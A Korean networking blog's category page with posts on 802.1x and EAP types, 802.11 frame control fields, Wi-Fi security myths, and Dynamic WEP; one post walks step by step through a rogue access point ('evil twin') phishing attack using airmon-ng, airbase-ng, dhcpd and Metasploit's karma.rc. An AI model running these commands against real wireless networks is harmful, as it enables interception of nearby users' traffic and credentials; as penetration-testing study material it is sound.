'공부/Network'에 해당되는 글 55건

  1. 2012.06.29 [802.11] 802.1x(detailed) 1
  2. 2012.06.29 [802.11] Frame - Frame Control
  3. 2012.06.29 [802.11] 4가지 오해들
  4. 2012.06.29 [802.11] Phishing Attack 2
  5. 2012.06.29 [802.11] Dynamic WEP 1
  6. 2012.06.29 [802.11] WPA-PSK, AES, TKIP
  7. 2012.06.29 [802.11] WIPS 1
  8. 2012.06.29 [802.11] 802.11i
  9. 2012.06.29 [802.11] 802.1x 1
  10. 2012.06.29 [802.11] DoS Attack

EAP 유형 약어 - MD5, LEAP, PEAP, TLS 및 TTLS

 

802.1x에 대한 개요


인증을 통해 네트워크를 보호하는 포트 액세스 프로토콜입니다. 결과적으로 이러한 유형의 인증 방법은 매체 속성상 무선 환경에 매우 유용합니다. 무선 사용자가 802.1x를 통해 네트워크 액세스를 위한 인증을 받게 되면 액세스 포인트에서 가상 포트가 열려 통신이 허용됩니다. 인증을 받지 못하면 가상 포트를 사용할 수 없어 통신이 차단됩니다. 

다음은 802.1x 인증을 위한 세 가지 기본 요소입니다.

  1. 요청자 - 무선 워크스테이션에서 실행되는 소프트웨어 클라이언트
  2. 인증자 - 무선 액세스 포인트

인증 서버 - 인증 데이터베이스(일반적으로 Cisco ACS*, Funk Steel-Belted RADIUS* 또는 Microsoft IAS*와 같은 Radius 서버)

EAP(Extensible Authentication Protocol)는 요청자(무선 워크스테이션)와 인증 서버(Microsoft IAS 등) 사이에 인증 정보를 전달하는 데 사용되며 실제 인증은 EAP 유형에 의해 정의 및 처리됩니다. 인증자 역할을 하는 액세스 포인트는 요청자와 인증 서버가 통신할 수 있도록 하는 프록시일 뿐입니다.

 

 

사용할 EAP 유형
구현할 EAP의 유형 또는 802.1x를 구현할지 여부는 조직에서 요구하는 보안 수준과 필요한 관리 오버헤드/기능에 따라 다릅니다. 여기서 제공하는 설명 및 비교 차트를 통해 여러 가지 EAP 유형을 보다 쉽게 이해할 수 있습니다. 

EAP(Extensible Authentication Protocol) 인증 유형
WLAN 보안은 필수적이며 EAP 인증 유형은 WLAN 연결의 보안을 강화하는 유용한 방법을 제공하므로 공급업체마다 자사의 WLAN 액세스 포인트 제품에 필요한 EAP 인증 유형을 빠르게 개발하고 있습니다. 가장 널리 사용되는 EAP 인증 유형으로는 EAP-MD-5, EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-Fast 및 Cisco LEAP가 있습니다. 

  • EAP-MD-5(Message Digest) Challenge는 기본적인 수준의 EAP 지원을 제공하는 EAP 인증 유형입니다. EAP-MD-5는 사용자 암호를 알아낼 수 있으므로 일반적으로 무선 LAN 구현에는 권장되지 않습니다. 이 인증 유형은 실제로는 무선 클라이언트와 네트워크에 대한 상호 인증 단계가 없으므로 단방향 인증만 제공합니다. 또한 동적인 세션 기반 WEP(Wired Equivalent Privacy) 키를 알아낼 수 있는 방법을 제공하지 않는다는 점에서 매우 중요한 인증 유형 중 하나입니다.

 

  • EAP-TLS(Transport Layer Security)는 클라이언트 및 네트워크에 대한 인증서 기반 상호 인증 기능을 제공합니다. 이 방법은 클라이언트측 인증서와 서버측 인증서를 통해 인증을 수행하며 WLAN 클라이언트와 액세스 포인트 간 후속 통신에 대한 보안을 강화하기 위해 사용자 기본 WEP 키 및 세션 기반 WEP 키를 동적으로 생성합니다. EAP-TLS의 한 가지 단점은 클라이언트측과 서버측 모두에서 인증서를 관리해야 한다는 점입니다. 이는 규모가 큰 WLAN을 설치하는 경우 번거로운 작업이 될 수 있습니다.

 

  • EAP-TTLS(Tunneled Transport Layer Security)는 Funk Software와 Certicom이 EAP-TLS를 보강하여 개발한 방법입니다. 이 보안 방법은 암호화된 채널(또는 "터널")을 통해 클라이언트와 네트워크에 대한 인증서 기반 상호 인증 및 동적인 사용자 또는 세션 기반 WEP 키를 생성할 수 있는 방법을 제공합니다. EAP-TLS와 달리 EAP-TTLS에는 서버측 인증서만 있으면 됩니다.

 

  • EAP-FAST(Flexible Authentication via Secure Tunneling)는 Cisco에서 개발한 것으로, 인증서를 사용하는 대신 인증 서버에서 동적으로 관리할 수 있는 PAC(보호 액세스 자격 증명) 방식으로 상호 인증이 구현됩니다. PAC는 수동 또는 자동으로 클라이언트에게 제공할 수 있습니다(한 번에 배포 가능). 수동으로 제공하는 경우 디스크나 보안된 네트워크 배포 방법을 통해 클라이언트에게 전달되며 자동으로 제공하는 경우에는 대역 내에서 또는 무선으로 배포됩니다.

 

  • LEAP(Lightweight Extensible Authentication Protocol)는 주로 Cisco Aironet WLAN에서 사용하는 EAP 인증 유형으로, 동적으로 생성된 WEP 키를 사용하여 전송 데이터를 암호화하며 상호 인증을 지원합니다. 지금까지 소유주인 Cisco가 Cisco 호환 확장 프로그램을 통해 여러 제조업체에 LEAP 사용을 허가해 왔습니댜.

 

  • PEAP(Protected Extensible Authentication Protocol)는 레거시 암호 기반 프로토콜과 같은 인증 데이터를 802.11 무선 네트워크를 통해 안전하게 전송할 수 있는 방법을 제공합니다. PEAP는 PEAP 클라이언트와 인증 서버 간 터널링을 사용하여 이 기능을 수행합니다. PEAP는 유사한 기능을 수행하는 TTLS( Tunneled Transport Layer Security)와 같이 서버측 인증서만을 사용하여 보안 무선 LAN의 구현 및 관리를 간소화함으로써 무선 LAN 클라이언트를 인증합니다. PEAP는 Microsoft, Cisco 및 RSA Security에서 개발한 방법입니다.

 

802.1x EAP 유형

기능 / 이점

MD5
---
Message Digest 5
TLS
---
Transport Level Security
TTLS
---
Tunneled Transport Level Security
PEAP
---
Protected Transport Level Security

FAST
---
Flexible Authentication via Secure Tunneling

LEAP
---
Lightweight Extensible Authentication Protocol
클라이언트측 인증서 필요아니오아니오아니오없음
(PAC)
아니오
서버측 인증서 필요아니오아니오없음
(PAC)
아니오
WEP 키 관리아니오
Rouge AP 감지아니오아니오아니오아니오
제공업체MSMSFunkMSCiscoCisco
인증 속성일방쌍방쌍방쌍방쌍방쌍방
구축 난이도용이어려움(클라이언트 인증서 구축으로 인해)중간중간중간중간
무선 보안낮음매우 높음높음높음높음높음(강력한 암호 사용 시)

 

위의 설명과 표의 내용에 대한 결론

  • MD5는 단방향 인증만을 수행하며 무엇보다 WEP 키의 자동 배포 및 순환을 지원하지 않아 수동 WEP 키 유지보수의 관리 부담을 줄일 수 없으므로 잘 사용되지 않습니다.

 

  • TLS의 경우 보안 기능은 뛰어나지만 각 무선 워크스테이션에 클라이언트 인증서를 설치해야 합니다. PKI 인프라를 관리하려면 WLAN 자체에 대한 관리 외에 추가 관리 전문 기술과 시간이 필요합니다.

 

  • TTLS는 TLS를 터널링하여 클라이언트측 인증서에 대한 요구를 없앰으로써 인증서 문제를 해결합니다. 이 방법이 주로 사용됩니다. TTLS는 주로 Funk에서 관리하며 요청자 및 인증 서버 소프트웨어에 대한 대가를 별도로 지불해야 합니다.

 

  • LEAP는 가장 먼저 개발된 것으로, 과거에는 Cisco에게 소유권이 있었으며(Cisco 무선 어댑터와 함께 사용해야 함) Cisco는 Cisco 호환 확장 프로그램을 통해 여러 제조업체에게 LEAP 사용을 허가해 왔습니다. LEAP를 인증에 사용하는 경우에는 강력한 암호 정책을 설정해야 합니다.

 

  • 이제 강력한 암호 정책을 설정하거나 인증에 대한 인증서 구축을 원하지 않는 기업의 경우 EAP-FAST를 사용할 수 있습니다.

 

  • 가장 최근에 개발된 PEAP 방법은 클라이언트측에 대한 인증서가 필요하지 않다는 점에서 EAP-TTLS 방법과 유사합니다. PEAP는 Cisco 및 Microsoft에서 지원하는 방법으로, Microsoft에 추가 비용을 지불하지 않고 사용이 가능합니다. LEAP에서 PEAP로 데이터를 전송하려는 경우 Cisco의 ACS 인증 서버가 두 방법을 모두 실행합니다.

 

 

 

데이터 개인 정보 보호


데이터 개인 정보 보호는 데이터를 전송하기 전에 암호화한 다음 수신 종단에서 암호를 해독(일반 데이터 복구)하는 자격 증명 키를 사용하여 구현됩니다. WEP(Wired Equivalent Privacy)는 상대적으로 보안에 취약하므로 무선 데이터의 보호 기능을 향상시키기 위해 WPA 및 WPA2와 같은 다른 방법이 개발되었습니다.

WPA*(Wi-Fi* Protected Access)
Wi-Fi Alliance는 개정된 802.11i 표준을 충족시킬 수 있는 보다 강력한 무선 LAN 보안 솔루션을 개발하기 위한 노력 끝에 2003년 말 이 표준 기반 솔루션을 발표했습니다. WPA*에는 802.1x 인증 및 TKIP 암호화가 포함됩니다(WEP 암호화보다 강화된 보안 방식).

 

WPA2*(Wi-Fi* Protected Access 2) 
Wi-Fi Alliance는 2004년 말 차세대 WPA* 보안 솔루션을 발표했습니다. WPA*와 같이 WPA2*에도 802.1x 인증이 포함됩니다. 802.11i 개정에 따라 WPA2는 AES(Advanced Encryption Standard)를 사용하여 데이터 개인 정보를 보호합니다.

 

WPA* Personal 및 WPA2* Personal
인증 서버가 없는 소규모 사무실이나 가정에서는 PSK(Pre-Shared Key)의 사용을 통해 액세스에 대한 인증이 결정됩니다. 사전 공유 키는 16진수 문자열이거나 암호문으로, 액세스 포인트와 모든 클라이언트 간에 일치해아 합니다. WPA Personal 또는 WPA2 Personal 방법을 사용하는 경우에는 802.1x 보안을 사용할 수 없습니다.

기타 보안 옵션

VPN


인증 및 개인 정보 보호(암호화)를 위한 방법으로 WLAN 대신 많은 기업에서는 VPN을 구현하고 있습니다. 즉, 기업 방화벽 외부에 액세스 포인트를 설치하고 사용자가 원격 사용자인 것처럼 VPN 게이트웨이를 통해 통신하도록 하는 것입니다. VPN 솔루션 구현 방법의 단점은 비용이 많이 소요되고 초기 설치 과정이 복잡하며 지속적인 관리 부담을 고려해야 한다는 점입니다.

 

 

 

출처 - 인텔 코리아(http://www.intel.com)

 

 

'공부 > Network' 카테고리의 다른 글

[802.11] WNetwork Security Protocols(1) - What is Security Protocol?  (0) 2012.06.29
[802.11] Standard  (0) 2012.06.29
[802.11] Frame - Frame Control  (0) 2012.06.29
[802.11] 4가지 오해들  (0) 2012.06.29
[802.11] Phishing Attack  (2) 2012.06.29
Posted by extr
:

 



 

프레임에 대해 글을 쓸 것입니다.

 

네이버에 뒤져보고 구글에 뒤져보고 온갖 다 뒤져봐서 나온 별거없는 결과물이에요..ㅋ

 

 

우선 위에껀 다 잠시 스킵하고 프레임 컨트롤(FC : Frame Control) 부터 볼게요

 

프레임 컨트롤은 총 2byte의 공간을 갖고, 그 내부 값들은 다음과 같습니다.

 

1. Protocol Version.............2 bit

2. Frame Type....................2 bit

3. Frame Subtype................4 bit

4. To DS ...........................1 bit

5. From DS ........................1 bit

6. More Fragment................1 bit

7. Retry..............................1 bit

8. Power Management.........1 bit

9. More Data......................1 bit

10. WEP ............................1 bit

11. Order ..........................1 bit

 

 

하나하나 짚어봅시다 ^-^;;

 

 

 

1. Protocol Version.............2 bit

 

=> 말 그대로 802.11 MAC프로토콜의 버젼을 의미합니다.

이는 항상..0으로 초기화되어있답니다. 왜냐하면 0 하나밖에 없으니까요 ㅋ_ㅋ

 


 

 

2. Frame Type....................2 bit

 

=> 이거슨.. 프레임의 유형이 정의되어 있습니다.

총 2비트로 구성되어있으며,

 

관리 프레임을 의미하는 00(0)

제어 프레임을 의미하는 01(1)

데이터 프레임을 의미하는 10(2)

예약된 프레임을 의미하는 11(3) 

 

이렇게 네 가지로 구성되어 있습니다.

 

각각에 대한 설명은 검색을 통해서 자세한 이해를 하시길 바랍니다.

 

 

 

3. Frame Subtype................4 bit

 

부 유형은 유형의 종류에 따라 달라집니다.

 

관리프레임

 

0000(0) - Association Request    (결합 요청)

0001(1) - Association Response (결합 응답)

0010(2)- Reassociation Request    (재결합 요청)

0011(3) - Reassociation Response (재결합 응답)

0100(4) - Probe Request    (프로브 요청)

0101(5) - Probe Response (프로브 응답)

1000(8) - Beacon (비콘)

1001(9) - ATIM (Announcement Traffic Indication Message)

1010(10) - Association Clear (결합 해제)

1011(11) - Authentication (인증)

1100 (12)- Authentication Clear (인증 해제)

 

제어 프레임

 

1010(10) - Power Management Mode (전력 절약 모드)

1011(11) - RTS (Request to Send)

1100(12) - CTS (Clear to Send)

1101(13) - ACK (Acknowledgement)

데이터 프레임

 

0000(0) - 데이터

0001(1) - 데이터 + CF ACK

0010(2) - 데이터 + CF Poll

0011(3) - 데이터 + CF ACK + CF Poll

0100(4)- NULL

0101(5) - CF ACK

0110(6) - CF Poll

0111(7) - CF ACK + CF Poll

 

 

4. To DS ..........................1 bit

5. From DS .......................1 bit

 

to DS랑 from DS는 그게 그거니까 하나로 묶어서 설명할게요 ㅋ_ㅋ

 

to DS란? 말 그대로 DS로 보내는거지요^

 

 

station이 AP를 통해 다른 station에게 보내고자 할 때 DS를 반드시 거치게 됩니다. 고로, 발송할 때 to DS가 활성화 됩니다.

 

to DS는 10(2) 입니다.

 

 

from DS는? 역으로 Infrastructure 네트워크상에 존재하는 AP로부터 station에게 보내는겁니다. 이건 01(1)입니다.

 

인프라 스트럭쳐 네트워크가 아닌 Ad-hoc(IBSS)통신일 경우엔 00(0)이 활성화가 됩니다.

 

이 외에 11(3)은 무선 브릿지를 의미합니다.

 

 

 

6. More Fragment...............1 bit

 

데이터를 분할할게 더 있는지 확인하는 부분입니다.

 

 

예를 들어, 3000byte의 데이터 프레임을 한번에 전송하려고하면 MTU(Maximum Transfer Unit) 수치에 벗어나기 때문에 이 데이터를 분할합니다.

 

무선에서의 MTU는 최대 2304byte(2312byte라고 정의되어있는 이유는, 실제론 WEP의 오버헤드를 수용하기 때문에 8byte가 추가되기 때문이다.

 

인데, 이렇게되면 2304byte와 696byte 이렇게 2번 분할이 됩니다.

 

자신의 데이터 프레임 뒤에 분할된 프레임이 존재할 경우엔 1(1)이 활성화가 되고, 존재하지 않을 땐 0(0)이 활성화 됩니다.

 

 

 

7. Retry............................1 bit

 

ACK를 받지 못하여 재 전송이 필요할 시 사용됩니다.

 

또, 수신 스테이션이 중복되는 프레임이 존재할 경우 재 전송을 하여 제거하는 경우에도 사용이 됩니다.


 

 

8. Power Management.........1 bit

 

전원 절약 모드에 빠졌는지, 그 여부를 나타내는 필드입니다.

 

power management 모드라면 1(1)로 표시되고, 아니라면 0(0)으로 표시됩니다.

 

station의 경우 이 필드 값이 가변적일 수도 있지만, AP의 경우 항상 켜져있어야 하므로 그 값이 항상 0(0)으로 셋팅되어 있어야 합니다.

 

 

 

9. More Data.....................1 bit

 

흠..이것은..전원 절약 모드일 때 사용되어집니다.

 

스테이션이 전원 절약모드 일땐 해당 스테이션을 목적지로하는 데이터 프레임을 AP는 버퍼링(buffering)하여야 합니다.

 

여기서 버퍼링이란, 일시적으로 저장하여 놓는다는 의미로 받아들이시면 됩니다.

 

AP는 이 비트를 설정해서 전원 절약 모드에 빠진 스테이션을 확인하여 프레임을 전송해야한다는 것을 지시하게 됩니다.

 

이 비트는 관리 프레임과 데이터프레임에서는 1(1)로 설정이 가능하며, 제어프레임일 경우엔 사용이 불가능하기 때문에 0(0)으로 세팅합니다.

 

 

 

10. WEP ..........................1 bit

 

WEP(Wired Equivalent Privacy : 유선 동등 프라이버시) 암호화를 의미합니다.

 

WEP암호화가 적용된 프레임인 경우, 1(1)로 설정되어있습니다.

 

당연히 적용되지 않은 경우엔 0(0)이겠죠?

 

 

 

11. Order .........................1 bit

 

데이터가 너무 커서 분할된 데이터인 경우, 순서가 알맞지 않게 전송이 될 수 있습니다.

 

이를 보완하기 위해 이 필드를 설정할 수 있습니다.

 

Order 필드는 순서를 지정하여 순서대로 전송을 할 수 있게 하는 일종의 '순번' 역할을 합니다.

 

 

 

 

하..지금까지 802.11의 프레임에서!! MAC 프레임 헤더의!! 프레임 컨트롤에 대해 알아봤습니다.

 

되게...ㅋ...양이 만만치않네요...................ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ

 

새벽에 쓴 글이라 말이 헛나왔다거나 어색한게 있을 수 있습니다 ㅠㅠ 있으면 지적좀 부탁드립니다~ㅜㅜ

 

 

 

 

참고키워드-802.11 frame, 802.11 MAC frame, 802.11 Frame Control

 

참고문헌- 802.11 Wireless Networks: The Definitive Guide

 

출처 - 옛날 블로그 2011/04/27 03:13


'공부 > Network' 카테고리의 다른 글

[802.11] Standard  (0) 2012.06.29
[802.11] 802.1x(detailed)  (1) 2012.06.29
[802.11] 4가지 오해들  (0) 2012.06.29
[802.11] Phishing Attack  (2) 2012.06.29
[802.11] Dynamic WEP  (1) 2012.06.29
Posted by extr
:

무선 인터넷 보안은 더 이상 전문가나 시스템 관리자들만의 영역은 아닙니다. 이제는 무선 인터넷과 매일 매일의 생활을 해나가고 있는 모든분들에게 해당되는 문제가 되었습니다.



이미 많은분들이 사무실 혹은 가정에서 무선, 혹은 유무선 공유기등으로 무선 인터넷 환경을 구축해서 인터넷을 사용하고 있습니다. 이 경우, 보안을 고려하지 않고 그냥 사용하시게 되면 인터넷으로 주고 받는 정보나 민감한 파일이 위험에 노출되게 됩니다.



그래서, 이번 포스팅 시리즈에서는 가정의 무선 네트워크를 안전하게 하는데 필요한 근본적이고도 기본적인 것들을 소개해 드리려고 합니다.



특히, 일반적으로 무선으로 사용하고 계시는 모든분들이 게임 콘솔, 인터넷 전화, 데스크탑 컴퓨터, 노트북들이 함께하는 무선 네트워크를 안전하게 하기 위해서 알아야할 중요한, 핵심적인 것들을 다루어 보려고 합니다.



WEP나 WPA같은 암호화 방법들에 대해서도 설명하고, 그 밖에 무선 네트워크 보안과 관련된 기본적인 것들도 몇 가지 살펴보고, 그리고 어떻게 하면 무선 네트워크를 안전하게 할 수 있을지에 대해서 함께 생각하는 시간을 마련해 보고자 합니다.



만일 이미 기술적으로 환하게 알고 계신다면, 제가 쓴 이 글의 내용을 알맞게 다듬어서 가족이나 친척에게 보낸다면 아마도 새롭게 무선 네트워크를 설정할때에 문의 전화를 하게되는 횟수가 줄게되지 않을까 생각합니다 ^^;;



이건 참고사항 입니닷: 이 짧은 포스팅 시리즈에서는 802.11g/802.11 드래프트 n 라우터를 안전하게 하는데에 촛점을 맞출 생각입니다.

이 두가지 타입이 현재 시장에서 가장 공통적인 타입이라고 생각되기 때문입니다.



여기에서 제시하는 정보들은 더 오래된 802.11b 나, 혹은 더 심하게(?!?) 오래된 802.11a 라우터에도 당근하게(=당연하게) 적용될 수 있습니다. 물론, 이 경우에는 구입하신 라우터의 제조자가 알맞은 펌웨어 업데이트를 제공했다는 가정하에서 입니다...



그리고 글에서 자주 언급되는 라우터는 무선, 혹은 유무선 겸용 공유기를 이야기 하는거라고 보시면 됩니다^^....




우선적으로 알아야 할것!



무선 보안에 대해서 우선적으로 이해하셔야 할것은 (대부분이) 기본적으로, 아무것도 되어있지 않다는 점입니다.


여러분이 구입하신 라우터는 아마도 누구나가 다 접근할 수 있도록 (오픈 액세스) 미리 그렇게 설정되어 있을것입니다. 이렇게되면 근처에 있는 그 누구라도 연결하고 MP3 파일(나아가서는 중요하거나 민감한 파일)들을 훔쳐오는게 가능하게 되어버립니다.



이렇게 미리 누구나 다 접근할 수 있게 설정되어 있으면 라우터를 가지고 설정하는게 쉬워집니다. (요즘의 대부분의 운영체제에서는, 이 경우에 어댑터나 라우터를 연결하는것 이상으로 더 해야할게 거의 없기 때문입니다.)



하지만 저런 상태는 무선 인터넷 접속 지점(WAP, Wireless Access Point) 이 100% 공격에 무방비가 되게 만들어 버립니다. 대부분의 제조자들이 간단한 로그인/암호 조합을 쓰지만 그러한 정보는 온라인에서 쉽게 구할 수 있습니다.



그렇기 때문에 무선 네트워크를 안전하게 하는 첫번째 단계는 라우터의 기본 암호를 변경하는 일입니다.



대부분의 제조자들은 기본 암호를 "admin", "password", "changeme"등과 같은 너무나 간단한 형태로 설정해두며, 라우터의 IP 주소는 거의 대부분, 변화가 단순한 192.168.x.1 의 형태를 가집니다. (x = 0,1, 15 등이 될 수 있습니다. 192.168.x.x 형태의 IP를 사설IP라고 부릅니다. 공유기를 사용해보셨다면 이미 익숙하실 겁니다 :) )



흔하지 않은, 강력한 암호는 실제 암호화 기술(WEP, WPA등) 대신에 쓰일수는 없겠지만, 적어도 바른 방향을 향한 첫번째 한걸음 이라고 생각합니다.



다음 단계는 구입한 라우터의 펌웨어 업데이트를 체크해야 합니다. 특히, 오래된 모델일 경우에는 더욱 하셔야 합니다.



더 나은 보안 설정 (예: WPA. 뒤에 자세히 설명하겠습니닷!) 을 지원하지 않았던 많은 라우터들은 그러한 지원을 대부분 이후의 펌웨어 업그레이드로 제공합니다.




▲ 라우터의 암호를 설정하는 일은 여러분이 가장 먼져 하셔야 할 일입니다.




4가지 오해



많은 무선 인터넷과 관련된 보안 상식이나 팁이 있지만, 그중 무선 인터넷에 대한 확실한 보안이라고 믿고 있지만 실제로는 그렇지 않은것들이 있습니다.


이런것들은 실제로 그렇게 유용하지 않을뿐만 아니라 사용자가 잘못된 보안 지식을 갖게해 좋기 보다는 심지어 해를 끼칠수도 있습니다.


이중에서 크게 4가지를 다루어 보고자 합니다.





SSID 숨기기


SSID (Service Set Identifier)는 무선 라우터에 의해서 뿌려지는(브로드캐스트되는) 신원확인 코드(identification code) 입니다. (코드라고는 했지만... 일반적으로 단순한 이름의 형태 입니다.)



만일 무선 장비가 여러 접속 지점(AP, Access Point)으로부터 다중의 SSID를 발견하게 되면, 일반적으로 사용자에게 그중 어디에 연결해야 되는지 묻게 됩니다.

라우터에게 SSID를 뿌리지 않도록(브로드캐스트하지 않도록) 하는것은 기본적인 무선 액세스 소프트웨어가 (연결 옵션의 문제로서) 네트워크를 표시하는걸 방지할 수 있을지도 모르지만, 이것은 실제로 네트워크를 안전하게 하는데 아무것도 하지 않습니다.



어느때라도 사용자가 라우터에 연결하면, SSID는 암호화의 여부에 상관없이 평범한 텍스트(plaintext) 상태로 뿌려지게 됩니다.



이때 SSID 정보는 네트워크를 패시브 모드(Passive mode)로 수신하고 있는 그 누구라도 가져가 버릴 수 있습니다.





SSID 바꾸기


이 방법이 때때로 보안의 척도로서 추천되기도 합니다만, 실제로는 그렇지 않습니다.



접속 지점(AP)의 SSID를 변경하는 것은 라우터가 뿌리는(브로드캐스트하는) 신원 확인 코드를 변경할겁니다. 하지만 이것말고는 그 어떤것도 바꾸지 않을겁니다.



이 방법으로는 어떻게해서도 라우터가 발견되고, 정보가 훔쳐지고, 심지어 해킹당하는걸 방지할 수 없습니다.





DHCP 끄기


DHCP를 끄고 정적인 IP 주소를 사용하는것은 해킹에 대비한 방어가 될 수 없습니다.



네트워크를 침입하는(snooping) 사람은 IP 주소를 할당하기 위해서 사용된 패턴을 감지하고 파악해 낼 수 있으며 이에 알맞게 특정한 요청을 만들어 낼 수 있습니다.





맥(MAC) 어드레스 필터링 하기


이론적으로, 이 말은 매우 훌륭하게 들립니다. 모든 랜카드는 고유한 맥 어드레스를 가지고 있고, 무선 접속 지점(AP)은 특정한 랜카드만 접근 가능하도록하고 나머지를 차단하도록 설정될 수 있습니다.



그러나 맥주소를 필터링하는 방법의 문제점은, 이 주소들이 손쉽게 위조될 수 있고 적절한 모니터링 프로그램을 쓴다면 어려움없이 발견될 수 있다는 점입니다.



게다가, 이 접근 방법은 기업 환경에서 큰 부하를 일으키며, 많은 기기가 연결된 홈 네트워크에서도 과부하가 일어나서 얼마안가 곧 유지가 불가능하게 됩니다. (접근을 허용해야할 랜카드의 맥 어드레스의 목록을 하나 하나 기록하고 작성하고 보관/유지해야 하니 부하가 많이 생깁니다.)





위에서 말한 4가지 오해들중, 오직 맥 어드레스를 필터링하는 방법만이 최소의 가치가 있다고 봅니다.



맥어드레스를 필터링하는것은, 미운 이웃에게 알려준다면 최소한 그들이 손쉽게 침입당하지 않도록 할겁니다만, 그렇게 많은것을 하지는 않을것입니다.



(미워하는것도 어떻게 보면 감정이고, 사실 감정이란 것은 시간이 지남에 따라 자신에게 왔다가, 시간이 흐르면 또 가버리게 됩니다. 쉽지는 않겠지만, 이런 경우에는 감정에 집착하지 않는것이 좋다고 봅니다.



그들을 계속 미워할순 있겠지만, 미워할수록 마음은 불편하고 껄끄럽고 괴로워 집니다. 오히려 미운 사람을 용서 할 수 있다면, 그 순간 마음은 자유로워 지겠지요.)



마음을 굳게 먹고 결심한 침입자들이 들어 오는걸 막으려면 암호화(Encryption)를 사용하셔야만 합니다.



암호화라고 해서 많이 어렵기만 한건 아니구요, 이미 WEP나 WPA 같은 용어를 들어보신분도 계시리라 생각됩니다.


 

이제 다음부터는! 

무선 인터넷의 보안에 대해서 본격적으로 다뤄보겠습니다 ^_^...

 

 

출처 - http://comblog.wo.tc/


'공부 > Network' 카테고리의 다른 글

[802.11] 802.1x(detailed)  (1) 2012.06.29
[802.11] Frame - Frame Control  (0) 2012.06.29
[802.11] Phishing Attack  (2) 2012.06.29
[802.11] Dynamic WEP  (1) 2012.06.29
[802.11] WPA-PSK, AES, TKIP  (0) 2012.06.29
Posted by extr
:






무선 피싱 공격에 대해 알아보도록 하겠습니다.



무선 피싱 공격(wireless Phishing)이란??


무선해킹 피해사고 관련 뉴스: http://www.boannews.com/media/view.asp?idx=22344&kind=0


피싱(Phishing)이란 개인정보란 뜻의 (Private Data)와 낚시(Fishing)의 합성어로서 그냥 말 그대로 개인정보를 낚는다는 의미입니다.






피싱의 원리는 이러합니다.


AP와 연결된 Station을 DoS(서비스 거부 공격)을 이용하여 연결을 끊거나, 혹은 신호감도를 약해졌을 때



크래커가 만든 가짜AP에 접속하게 유도를 하는겁니다.


어떻게 유도를 할까요?



그건 로밍 트리거(Roaming Trigger)를 이용한 방법인데, 이종의 무선 네트워크의 특성입니다.



무선 네트워크는 연결이 끊어지거나, 신호가 약하면 더 강한 신호의 세기를 가진 네트워크에 연결하려는 특징이 있습니다.



이를 로밍 트리거라고하는데, 이를 이용하여 피싱을 하면 엄청나겠죠? 가령 자신이 더 높은 신호세기를 보내거나...



연결이 끊긴 후 station에게 기존 AP의 BSSID로 스푸핑을 하면?



 그러니까 이 그림 하나로 요약이 되는거죠.






그럼 본론에 앞서서 우선 전제 사항을 말씀드릴게요


[우선 이 모의해킹은 back track 4 final을 이용하여 진행하였습니다.]

[사용 가능한 무선 랜카드는 aircrack 홈페이지를 참고하시길 바랍니다.]






iwconfig


언제나 하던대로 우선 무선 네트워크가 연결되어있는지 확인합니다.







airmon-ng start <무선랜카드 명>


모니터 설정 모드로 모니터모드 1개를 만들어 줍니다.







한번 더 확인을 해서 성공적으로 모니터 모드가 만들어 졌다면 다음 단계로 진행합니다.








wget http://metasploit.com/users/hdm/tools/karma.rc


Web Get 명령을 통해 karma.rc파일을 다운로드 받습니다.


이 파일은 HTTP와 DNS서버를 연동시켜주는 역할을 합니다. 한마디로 가짜 AP에서도 인터넷이 되게하기위한 필수 요소겠지요.









vi <dhcpd.conf 파일의 경로>


dhcpd.conf 파일은 자동으로 아이피를 할당 받게. 그러니까 가짜 AP에 연결한 station들에게 자동으로 인터넷이 되게 


아이피를 자동으로 할당해주는 역할을 하는 기능을 합니다. 매우 중요한 역할을 수행하지요.


이 dhcpd.conf파일을 vi로 열어 다음과 같이 수정해줍니다 =)










수정하고 나시면 저장하시고 계속 진행됩니다.











airbase-ng -c <채널> -e "<ESSID>" -y -v <모니터링 무선 NIC>


airbase-ng는 가짜 AP를 만들어주는 프로그램입니다.


우선 위의 사진을 해석하자면 이렇습니다.


1번 채널로 "DCosAP"라는 SSID를 가진 AP를 만든다..


-y라는 옵션은 Probe Request에 대해 Response하지 않겠다는 의미입니다.


즉, 자동으로 연결하려는 station은 별도의 응답을 하지않고 바로바로 연결시켜주겠다는 뜻이 되지요.










명령어를 입력하시면 저렇게 뜨는걸 보실 수 있습니다.










ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

ifconfig at0



이제 저렇게 명령어를 입력해서 가상 랜카드에 넷마스크와 게이트웨이를 설정해 줍니다.


이렇게 설정해야 접속된 station들에게 DHCP로 자동적으로 10.0.0.0 대역으로 아이피를 부여해줄 수 있기 때문이죠.









dhcpd3 -cf <dhcpd.conf 파일의 위치> at0


이제 저 명령어를 통해서 DHCP설정을 at0이라는 가상으로 만든 NIC에 활성화시켜 줍니다.


여기까지 과정이 되면 연결된 station은 자동으로 IP를 할당받게 됩니다.










msfconsole -r <karma.rc파일의 위치>


이 명령어는 DNS서버와 HTTP를 연결시켜주는 명령어입니다.


이렇게 함으로써 정상적인 인터넷을 할 수 있게 됩니다.(참고※크래커의 컴퓨터가 인터넷이 되지않는다면 무용지물입니다.)











카르마파일을 실행하고나면 위와같이 좌르륵뜨다가 서버가 스타트됩니다.













그리고 피싱AP가 실제로 등록된 모습을 확인하실 수 있습니다.





출처 - 옛날 블로그 2011/02/27 13:53


'공부 > Network' 카테고리의 다른 글

[802.11] Frame - Frame Control  (0) 2012.06.29
[802.11] 4가지 오해들  (0) 2012.06.29
[802.11] Dynamic WEP  (1) 2012.06.29
[802.11] WPA-PSK, AES, TKIP  (0) 2012.06.29
[802.11] WIPS  (1) 2012.06.29
Posted by extr
:

[802.11] Dynamic WEP

공부/Network 2012. 6. 29. 16:32 |

우선 WEP의 얘기를 다시 꺼내어 봅시다.



WEP(Wired Equivalent Protocol)은 유선랜에서 제공하는 것과 유사한 수준의 보안 및 기밀 보안을 무선랜에도 적용하기 위하여 Wi-Fi 표준에 정의해둔 보안 프로토콜입니다.




그러나 우수한 암호화 성능에도 불구하고 수동으로 WEP을 설정할 경우, 오류의 가능성이나 장시간 변경을 하지 않을 경우 크랙의 위험성을 안고

있는 반면, 



EAP-TLS 이상의 인증에서 제공하는 기능인 Dynamic WEP Key의 경우는 WEP이 자동으로 설정, 주기적으로 갱신되므로 오류나 크랙의가능성을 최소화할 수 있습니다.


또한 무선 데이터 구간을 암호화함으로써 높은 보안 성능을 보장합니다.   




